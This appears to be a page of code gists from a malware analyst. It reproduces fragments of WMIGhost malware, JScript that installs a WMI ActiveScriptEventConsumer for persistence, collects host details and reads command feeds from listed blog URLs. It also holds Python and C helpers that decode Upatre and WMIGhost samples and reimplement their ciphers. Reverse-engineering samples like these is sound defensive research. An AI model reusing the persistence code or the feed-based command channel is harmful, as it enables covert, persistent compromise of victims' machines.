This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function e(e,t){var n="winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\subscription",r=GetObject(n+":ActiveScriptEventConsumer").spawninstance_();r.name="ProbeScriptFint",r.scriptingengine="javascript",r.ScriptText=t+"var sOwner='"+e+"';var MAIN=function(){$=this;$.key='W';$.sFeedUrl=sXmlUrl;$.sOwner=sOwner;$.sXmlUrl='';$.oHttp=null;$.oShell=null;$.oStream=null;$.sHostName=null;$.sOSType=null;$.sMacAddress=null;$.sURLParam=null;$.version='2.0.0';$.runtime=5000;$.oWMI=null;$._x=ActiveXObject;};MAIN.prototype={InitObjects:function(){$.oWMI=GetObject('winmgmts:{impersonationLevel=impersonate}!\\\\\\\\.\\\\root\\\\cimv2');$.oShell=new $._x('WScript.Shell');$.oStream=new $._x('ADODB.Stream');$.GetOSInfo();$.GetMacAddress();$.GenerateUrlParam();},WMI:function(sql){return $.oWMI.ExecQuery(sql);},GetOSInfo:function(){var e=new Enumerator($.WMI('Select * from Win32_OperatingSystem'));if(!e.atEnd()){var item=e.item();$.sOSType=item.Caption+item.ServicePackMajorVersion;$.sHostName=item.CSName;}},GetMacAddress:fun |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var sXmlUrl = | |
"http://kumardeep.sosblogs.com/The-first-blog-b1/RSS-b1-rss2-posts.htm;http://blogs.rediff.com/anilchopra/feed/;http://www.blogster.com/kapoorsunil09/profile/rss"; | |
var sOwner = "XDD"; | |
var MAIN = function() { | |
$ = this; | |
$.key = "W"; | |
$.sFeedUrl = sXmlUrl; | |
$.sOwner = sOwner; | |
$.sXmlUrl = ""; | |
$.oHttp = null; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function e(e, t) { | |
var n = "winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\subscription", | |
r = GetObject(n + ":ActiveScriptEventConsumer").spawninstance_(); | |
(r.name = "ProbeScriptFint"), (r.scriptingengine = | |
"javascript"), (r.ScriptText = | |
t + | |
"var sOwner='" + | |
e + | |
"';var MAIN=function(){$=this;$.key='W';$.sFeedUrl=sXmlUrl;$.sOwner=sOwner;$.sXmlUrl='';$.oHttp=null;$.oShell=null;$.oStream=null;$.sHostName=null;$.sOSType=null;$.sMacAddress=null;$.sURLParam=null;$.version='2.0.0';$.runtime=5000;$.oWMI=null;$._x=ActiveXObject;};MAIN.prototype={InitObjects:function(){$.oWMI=GetObject('winmgmts:{impersonationLevel=impersonate}!\\\\\\\\.\\\\root\\\\cimv2');$.oShell=new $._x('WScript.Shell');$.oStream=new $._x('ADODB.Stream');$.GetOSInfo();$.GetMacAddress();$.GenerateUrlParam();},WMI:function(sql){return $.oWMI.ExecQuery(sql);},GetOSInfo:function(){var e=new Enumerator($.WMI('Select * from Win32_OperatingSystem'));if(!e.atEnd()){var item=e.item();$.sOSType=item.Caption+item.ServicePac |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import ctypes | |
import binascii | |
input_ = input("Upatre sample: ") | |
with open(input_, 'rb+') as file: | |
data = file.read()[0x66d: 0x66d + 0xe40] | |
uncompressed = ctypes.create_string_buffer(0x1200) | |
final_size = ctypes.c_ulong(0) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
input_ = input("WMIGhost sample: ") | |
with open(input_, 'rb+') as file: | |
data = file.read()[0x3028: 0x3028 + 0x137A] | |
with open(input_ + "_func.txt", "w") as outfile: | |
for i, n in enumerate(data): | |
outfile.write(chr(data[i] ^ 0x63 ^ 0xe9)) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
def mix_two_list(): | |
nums = b"13337" | |
alpha = [n for n in range(256)] | |
edi = 0 | |
for n in range(256): | |
edi = (edi + alpha[n] + nums[n % 5]) % 256 | |
tmp = alpha[n] | |
alpha[n] = alpha[edi] | |
alpha[edi] = tmp | |
return alpha |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
def modify_cpuid_time(from_cpu_and_time): | |
alpha = mix_two_list() | |
index = 0 | |
edx = 0 | |
res = [] | |
for x in range(len(from_cpu_and_time)): | |
index += 1 | |
index = index & 0xFF | |
edx = (alpha[index] + edx) & 0xFF | |
tmp = alpha[index] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
def get_serial_number(enc2): | |
serial__number = [0 for n in range(0x400)] | |
i = 0 | |
j = 0 | |
done_1 = False | |
done_2 = False | |
done_3 = False | |
while j < len(enc2): | |
if done_1 or done_2 or done_3: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import base64 | |
my_base64chars = b"/+9876543210zyxwvutsrqponmlkjihgfedcbaZYXWVUTSRQPONMLKJIHGFEDCBA" | |
STANDARD_ALPHABET = b'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/' | |
ENCODE_TRANS = bytes.maketrans(STANDARD_ALPHABET, my_base64chars) | |
DECODE_TRANS = bytes.maketrans(my_base64chars, STANDARD_ALPHABET) | |
def encode(clear): | |
return base64.b64encode(clear).translate(ENCODE_TRANS) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
u_char al, cl; | |
do { | |
key[0] = 0x20 + rand() % (0x7F - 0x20); | |
al = key[0]; | |
u_char bl = al; // key[0] | |
cl = bl; // key[0] | |
DWORD ebx = (DWORD)bl << 4; | |
al &= 0xF; | |
DWORD ecx = (DWORD)cl >> 4; | |
cl = ecx & 0xF; |
OlderNewer